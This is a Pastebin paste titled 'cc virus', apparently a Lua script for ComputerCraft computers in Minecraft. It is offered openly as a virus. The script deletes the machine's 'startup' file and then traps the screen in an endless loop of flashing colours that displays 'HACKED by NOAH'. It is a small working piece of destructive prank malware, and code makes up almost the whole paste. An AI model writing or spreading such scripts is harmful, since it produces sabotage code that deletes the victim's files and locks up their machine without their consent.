Advertisement
PSquishyP

cc virus

Sep 1st, 2016
103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.75 KB | None | 0 0
  1. fs.delete("startup")
  2.  
  3. while true do
  4. term.setTextColor( colors.black )
  5. sleep(0)
  6. term.setBackgroundColor(colors.blue)
  7. term.clear()
  8. term.setCursorPos(1,1)
  9. term.write("HACKED by NOAH")
  10. sleep(0)
  11. term.setBackgroundColor(colors.red)
  12. term.clear()
  13. term.setCursorPos(1,1)
  14. term.write("HACKED by NOAH")
  15. sleep(0)
  16. term.setBackgroundColor(colors.yellow)
  17. term.clear()
  18. term.setCursorPos(1,1)
  19. term.write("HACKED by NOAH")
  20. sleep(0)
  21. term.setBackgroundColor(colors.lime)
  22. term.clear()
  23. term.setCursorPos(1,1)
  24. term.write("HACKED by NOAH")
  25. sleep(0)
  26. term.setBackgroundColor(colors.white)
  27. term.clear()
  28. term.setCursorPos(1,1)
  29. term.write("HACKED by NOAH")
  30. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement